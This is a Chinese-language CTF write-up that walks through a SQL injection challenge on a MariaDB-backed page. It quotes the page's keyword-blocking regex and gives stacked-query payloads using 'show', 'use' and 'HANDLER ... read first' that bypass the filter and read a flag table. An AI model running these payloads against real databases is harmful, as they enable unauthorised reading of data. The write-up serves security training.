首先输入1‘
报错

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

输入1’–+正确回显
可以初步判断为字符型注入
使用order by 判断有两列
1’order by 2–+
使用union注入触发了正则

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

说明不能使用select注入了
尝试堆叠注入
payload

1';show databases;--+

页面回显

说明存在堆叠注入，猜测flag在ctftraining中
payload

1';show tables from ctftraining;--+

flag可能在表FLAG_TABLE中
payload

';show columns from FLAG_TABLE;--+

页面无回显，说明当前数据库不是ctftraining，所以无法直接查看字段名

使用点号尝试跨库操作
payload

1';show columns from ctftraining.FLAG_TABLE;--+

触发正则，无法使用 ‘.’

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

使用ues将当前数据库改为ctftraining
payload

1';use ctftraining;show columns from FLAG_TABLE;--+

这里的字段名提示not flag
去查看其他表
payload

1';show tables;--+

payload

1';show columns from FlagHere;--+

这里直接在当前数据库中找到了flag字段名
接下来只需要根据字段名查到字段

但是这里过滤了许多函数
但没有过滤handler
handler命令查询规则

handler table_name open;handler table_name read first;handler table_name close;
#打开数据库，开始读它第一行数据，读取成功后进行关闭操作
handler table_name open;handler table_name read next;handler table_name close;
#打开数据库，开始循环读取，读取成功后进行关闭操作

payload

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;--+

成功拿到flag